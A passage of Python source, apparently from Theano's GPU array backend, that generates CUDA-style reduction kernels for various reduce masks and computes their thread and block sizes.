(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, 0, kernel_params);
%(err_check)s
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_110(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t) 256), 1, 1};
while (n_threads[0]*n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[0])
break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[2], 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_001(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[2], (size_t) 256), 1, 1};
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 4096), 1, 1};
while (n_blocks[0] * n_blocks[1] <= 4096)
{
if (n_blocks[1] > PyGpuArray_DIMS(%(x)s)[1])
break;
n_blocks[1] += 1;
}
n_blocks[1] -= 1;
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_101(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail,
extra_dims=[("size_t one = 1;", "(void *) &one")],
extra_strides=[("ssize_t sone = 1;", "(void *) &sone")],
pattern="1011")
print("""
{
int verbose = 0;
// size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3],
// (size_t) 256), 1, 1};
size_t n_threads[3] = {1, 1, 1};
while (n_threads[0] * (n_threads[1]+1) <= 256) ++n_threads[1];
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[2])
n_threads[1] = PyGpuArray_DIMS(%(x)s)[2];
while (n_threads[0] * n_threads[1] * (n_threads[2]+1) <= 256)
++n_threads[2];
if (n_threads[2] > 64)
n_threads[2] = 64;
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
n_threads[2] = PyGpuArray_DIMS(%(x)s)[0];
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[1], 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_111(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[2], (size_t) 256), 1, 1};
//get as many y threads as we can fit
while (n_threads[0] * n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[1])
break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
//get as many z threads as we can fit
while (n_threads[0] * n_threads[1] * n_threads[2] <= 256)
{
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
break;
n_threads[2] += 1;
}
n_threads[2] -= 1;
//Maximum for Fermi GPU on that dimensions.
n_threads[2] = std::min(n_threads[2], (size_t)64);
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_0011(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
print("""
{
int verbose = 0;
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 4096), 1, 1};
while (n_blocks[0] * n_blocks[1] <= 4096 &&
n_blocks[1] < PyGpuArray_DIMS(%(x)s)[1])
{
n_blocks[1] += 1;
}
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3], (size_t) 256), 1, 1};
while (n_threads[0] * n_threads[1] <= 256
&& n_threads[1] < PyGpuArray_DIMS(%(x)s)[2]
&& n_threads[0] * n_threads[1] * sizeof(%(acc_dtype)s) <=(15*1024-200))
{
n_threads[1] += 1;
}
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_1111(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[2], (size_t) 256), 1, 1};
//get as many y threads as we can fit
while (n_threads[0] * n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[1])
break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
//get as many z threads as we can fit
while (n_threads[0] * n_threads[1] * n_threads[2] <= 256)
{
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
break;
n_threads[2] += 1;
}
n_threads[2] -= 1;
//Maximum for Fermi GPU on that dimensions.
n_threads[2] = std::min(n_threads[2], (size_t)64);
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_1011(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3], (size_t) 256), 1, 1};
while (n_threads[0] * (n_threads[1]+1) <= 256) ++n_threads[1];
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[2])
n_threads[1] = PyGpuArray_DIMS(%(x)s)[2];
while (n_threads[0] * n_threads[1] * (n_threads[2]+1) <= 256) ++n_threads[2];
if (n_threads[2] > 64)
n_threads[2] = 64;
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
n_threads[2] = PyGpuArray_DIMS(%(x)s)[0];
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[1], 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_cache_version_apply(self, node):
version = [18] # the version corresponding to the c code in this Op
# now we insert versions for the ops on which we depend...
scalar_node = Apply(
self.scalar_op,
[Scalar(dtype=input.type.dtype)() for input in node.inputs],
[Scalar(dtype=output.type.dtype)() for output in node.outputs])
version.extend(self.scalar_op.c_code_cache_version_apply(scalar_node))
for i in node.inputs + node.outputs:
version.extend(Scalar(dtype=i.type.dtype).c_code_cache_version())
version.extend(self.kernel_version(node))
if all(version):
return tuple(version)
else:
return ()
def gpu_kernels(self, node, nodename):
nd_in = len(self.reduce_mask)
in_dtype = node.inputs[0].dtype
out_dtype = node.outputs[0].dtype
acc_dtype = self._acc_dtype(node.inputs[0].dtype)
flags = Kernel.get_flags(in_dtype, acc_dtype, out_dtype)
in_type = gpuarray.dtype_to_ctype(in_dtype)
out_type = gpuarray.dtype_to_ctype(out_dtype)
acc_type = gpuarray.dtype_to_ctype(acc_dtype)
load_in = load_w(in_dtype)
write_out = write_w(out_dtype)
kernels = []
if all(i == 1 for i in self.reduce_mask):
# this kernel is ok for up to a few thousand elements, but
# it only runs on ONE multiprocessor
reducebuf = self._k_reduce_buf('Z[0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
kname = "kernel_reduce_ccontig"
k_var = "kernel_reduce_ccontig_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0,
const %(in_type)s *A, const ga_size offset_A,
%(out_type)s *Z, const ga_size offset_Z)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.x; i0 < d0; i0 += blockDim.x)
{
%(reduce_fct)s
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp',
gpuarray.GpuArray, 'uintp',
gpuarray.GpuArray, 'uintp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1,):
# this kernel is ok for up to a few thousand elements, but
# it only runs on ONE multiprocessor
reducebuf = self._k_reduce_buf('Z[0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
kname = "kernel_reduce_1"
k_var = "kernel_reduce_1_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0,
%(out_type)s * Z, const ga_size offset_Z)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.x; i0 < d0; i0 += blockDim.x)
{
%(reduce_fct)s
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp',
gpuarray.GpuArray, 'uintp',
'intp',
gpuarray.GpuArray, 'uintp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1):
# this kernel is ok for up to a few thousand elements, but
# it only runs on ONE multiprocessor
reducebuf = self._k_reduce_buf('Z[0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
kname = "kernel_reduce_11"
k_var = "kernel_reduce_11_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1,
%(out_type)s * Z, const ga_size offset_Z)
{
const int threadCount = blockDim.x * blockDim.y;
const int threadNum = threadIdx.y*blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.y; i0 < d0; i0 += blockDim.y)
{
for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp',
gpuarray.GpuArray, 'uintp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
# 01, 011, 0111
if (0 == self.reduce_mask[0] and
all(self.reduce_mask[1:]) and
nd_in in[2, 3, 4]):
# this kernel uses one block for each row.
# threads per block for each element per row.
N_pattern = ''.join(['1'] * (nd_in - 1))
# TODO: is it faster to hardcode sA3, etc. in the later
# code, rather than have the for_* variables declare them
# and the later code use their names?
if nd_in == 2:
for_i1 = "for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)"
first_i1 = 'threadIdx.x'
sA1 = 'sA1'
for_i2 = "int i2=0, sA2=0;"
sA2 = '0'
first_i2 = '0'
for_i3 = "int i3=0, sA3=0;"
sA3 = '0'
first_i3 = '0'
if nd_in == 3:
for_i1 = "for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)"
first_i1 = 'threadIdx.y'
sA1 = 'sA1'
for_i2 = "for (int i2 = threadIdx.x; i2 < d2; i2 += blockDim.x)"
first_i2 = 'threadIdx.x'
sA2 = 'sA2'
for_i3 = "int i3=0, sA3=0;"
                first_i3 = '0'
sA3 = '0'
if nd_in == 4:
for_i1 = "for (int i1 = threadIdx.z; i1 < d1; i1 += blockDim.z)"
first_i1 = 'threadIdx.z'
sA1 = 'sA1'
for_i2 = "for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)"
first_i2 = 'threadIdx.y'
sA2 = 'sA2'
for_i3 = "for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)"
first_i3 = 'threadIdx.x'
sA3 = 'sA3'
reducebuf = self._k_reduce_buf('Z[i0 * sZ0]', node,
nodename, sub={})
param_dim = ",".join(["const ga_size d%d" % i
for i in xrange(nd_in)])
param_strides = ",".join(["const ga_ssize sA%d" % i
for i in xrange(nd_in)])
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_init = self._assign_init(load_in + "(A[%(first_i3)s * %(sA3)s + %(first_i2)s * %(sA2)s + %(first_i1)s * %(sA1)s + i0 * sA0])" % locals())
reduce_fct = self._assign_reduce(
node, nodename, "myresult",
load_in + "(A[i3 * sA3 + i2 * sA2 + i1 * sA1 + i0 * sA0])",
{}, True)
sio = StringIO()
print("""
%(decl)s{
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x){
myresult = %(reduce_init)s;
%(for_i1)s{
%(for_i2)s{
%(for_i3)s{
%(reduce_fct)s;
}
}
}
%(reducebuf)s
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 1, 0) or self.reduce_mask == (1, 0):
# this kernel uses one block for each column,
# threads per block for each element per column.
# TODO: This kernel is pretty inefficient in terms of reading, because if A is
            # c_contiguous (typical case) then each warp is accessing non-contiguous
# memory (a segment of a column).
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i2*sZ1]',
node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + threadIdx.x * sA1 + i2 * sA2])")
kname = "kernel_reduce_010"
k_var = "kernel_reduce_010_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0, const ga_ssize sZ1)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i2 = blockIdx.y; i2 < d2; i2 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)
{
%(reduce_fct)s;
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask in [(0, 1, 0), (1, 0), (1, 0, 0)]:
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(X[a * sX0 + b * sX1 + c * sX2])",
{}, True)
reduce_init = self._assign_init(load_in + "(X[a * sX0 + 0 * sX1 + c * sX2])")
kname = "kernel_reduce_010_AD"
k_var = "kernel_reduce_010_AD_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size A, const ga_size B, const ga_size C, const ga_size D,
const %(in_type)s *X, const ga_size offset_X,
const ga_ssize sX0, const ga_ssize sX1, const ga_ssize sX2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0, const ga_ssize sZ1)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
%(acc_type)s myresult = 0;
X = (const %(in_type)s *)(((char *)X)+offset_X);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int a = blockIdx.x; a < A; a += gridDim.x)
{
for (int i2_D = blockIdx.y; i2_D < D; i2_D += gridDim.y)
{
int c = i2_D * 32 + threadIdx.x;
if (c < C)
{
myresult = %(reduce_init)s;
for (int b = 0; b < B; ++b)
{
%(reduce_fct)s;
}
Z[a * sZ0 + c * sZ1] = %(write_out)s(myresult);
}
}
}
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 1, 0):
#
# This kernel is optimized when the inner most dimensions
# have the smallest stride.
# this kernel uses one block for multiple columns (up to 32, TODO),
# threads per block for each element per column.
# thread.x = dim 2 contiguous
# thread.y = dim 1
# block.x = dim 0
# block.y = dim 2 rest (blockIdx.y tiles the remaining i2 chunks below)
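# Illustrative walk-through (an assumption, not from the original source):
# with A of shape (d0, d1, d2) = (64, 4096, 128), c_contiguous, and
# blockDim = (32, 8), each thread reads A[i0, i1, i2] with i2 advancing
# along the smallest stride, so the 32 threads of a warp hit consecutive
# addresses and the reduction over d1 stays fully coalesced.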
init = self._k_init(node, nodename)
decl, kname, params, k_var = self._k_decl(node, nodename, pattern="010_inner")
reducebuf = self._k_reduce_buf_multiple('Z[i0 * sZ0 + i2*sZ1]',
node, nodename,
'blockDim.x')
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + 0 * sA1 + i2 * sA2])")
sio = StringIO()
print("""
%(decl)s
{
if(warpSize<blockDim.x){
//TODO: set error code
Z[0] = -666;
return;
}
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i2 = blockIdx.y*blockDim.x+threadIdx.x; i2 < d2; i2 += gridDim.y*blockDim.x)
{
myresult = %(reduce_init)s;
for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)
{
%(reduce_fct)s;
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1, 0):
# this kernel uses one block for each column,
# threads per block for each element per column.
# TODO: This kernel is pretty inefficient in terms of reading, because if A is
# c_contiguous (typical case) then each warp is accessing non-contiguous
# memory (a segment of a column).
reducebuf = self._k_reduce_buf('Z[blockIdx.x * sZ0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + blockIdx.x * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[blockIdx.x * sA2])")
kname = "kernel_reduce_110"
k_var = "kernel_reduce_110_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0)
{
const int threadCount = blockDim.x * blockDim.y;
const int threadNum = threadIdx.y * blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
//TODO: set error code
Z[blockIdx.x * sZ0] = %(write_out)s(-666);
return;
}
for (int i0 = threadIdx.y; i0 < d0; i0 += blockDim.y)
{
for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 0, 0):
reducebuf = self._k_reduce_buf('Z[i1 * sZ0 + i2 * sZ1]',
node, nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i1 * sA1 + i2 * sA2])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
for (int i2 = blockIdx.y; i2 < d2; i2 += gridDim.y)
{
for (int i1 = blockIdx.x; i1 < d1; i1 += gridDim.x)
{
myresult = %(reduce_init)s;
for (int i0 = threadIdx.x; i0 < d0; i0 += blockDim.x)
{
%(reduce_fct)s
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1, 1):
reducebuf = self._k_reduce_buf('Z[0]', node,
nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
myresult = %(reduce_init)s;
for (int i0 = threadIdx.z; i0 < d0; i0 += blockDim.z)
{
for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)
{
for (int i2 = threadIdx.x; i2 < d2; i2 += blockDim.x)
{
%(reduce_fct)s;
}
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 0, 1):
# this kernel uses one block for each row,
# threads per block for each element per row.
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i1 * sZ1]',
node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + i1 * sA1])")
kname = "kernel_reduce_001"
k_var = "kernel_reduce_001_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0, const ga_ssize sZ1)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i1 = blockIdx.y; i1 < d1; i1 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i2 = threadIdx.x; i2 < d2; i2 += blockDim.x)
{
%(reduce_fct)s;
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 0, 1, 1):
# this kernel uses one block for each row,
# threads per block for each element per row.
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i1 * sZ1]',
node, nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + i1 * sA1])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i1 = blockIdx.y; i1 < d1; i1 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 1, 0, 1):
# this kernel uses one block for each row,
# threads per block for each element per row.
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i2 * sZ1]',
node, nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + i2 * sA2])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i2 = blockIdx.y; i2 < d2; i2 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1, 1, 1):
reducebuf = self._k_reduce_buf('Z[0]', node, nodename,
sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
myresult = %(reduce_init)s;
for (int i0 = 0; i0 < d0; i0++)
for (int i1 = threadIdx.z; i1 < d1; i1 += blockDim.z)
{
for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 0, 1, 1) or self.reduce_mask == (1, 0, 1):
reducebuf = self._k_reduce_buf('Z[blockIdx.x*sZ0]',
node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + blockIdx.x * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[blockIdx.x * sA1])")
kname = "kernel_reduce_1011"
k_var = "kernel_reduce_1011_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2, const ga_size d3,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2, const ga_ssize sA3,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0)
{
const int threadCount = blockDim.x * blockDim.y * blockDim.z;
const int threadNum = threadIdx.z * blockDim.x * blockDim.y + threadIdx.y * blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.z; i0 < d0; i0 += blockDim.z)
{
for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
return kernels
class GpuCAReduceCPY(GpuKernelBase, HideC, CAReduceDtype):
"""
CAReduce that reuses the python reduction code from gpuarray.
"""
def __init__(self, scalar_op, axis=None, dtype=None, acc_dtype=None):
if not hasattr(scalar_op, 'identity'):
raise ValueError("No identity on scalar op")
CAReduceDtype.__init__(self, scalar_op, axis=axis, dtype=dtype,
acc_dtype=acc_dtype)
def __str__(self):
ax = ''
if self.axis is not None:
ax = '{%s}' % (', '.join(str(x) for x in self.axis),)
return "GpuReduce{%s}%s" % (self.scalar_op, ax)
def make_node(self, input):
ctx_name = infer_context_name(input)
res = CAReduceDtype.make_node(self, input)
input = as_gpuarray_variable(input, ctx_name)
otype = GpuArrayType(dtype=res.outputs[0].dtype,
broadcastable=res.outputs[0].broadcastable,
context_name=ctx_name)
if res.op.axis is not None:
redux = []
for i in range(len(input.type.broadcastable)):
redux.append(i in res.op.axis)
# since redux is just another way to describe what is in axis
# it doesn't need to be compared in __eq__ or __hash__
res.op.redux = redux
return Apply(res.op, [input], [otype()])
def get_params(self, node):
return node.outputs[0].type.context
def make_thunk(self, node, storage_map, compute_map, no_recycling):
# cache the kernel object
self.get_kernel_cache(node)
